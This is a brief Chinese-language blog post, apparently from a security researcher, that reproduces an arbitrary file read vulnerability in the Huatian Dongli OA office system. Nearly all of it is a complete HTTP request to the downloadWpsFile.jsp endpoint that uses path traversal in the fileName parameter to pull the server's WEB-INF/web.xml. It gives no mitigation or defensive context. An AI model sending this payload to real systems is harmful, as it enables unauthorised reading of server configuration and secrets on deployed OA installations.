Babing
Published on 2024-08-30 / 1 Visits
0
0

H18-4华天动力-OA-任意文件读取

H18-4华天动力-OA-任意文件读取

漏洞复现:

payload:

GET /OAapp/jsp/downloadWpsFile.jsp?fileName=./././htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate

效果图

image-20240726130422033


Comment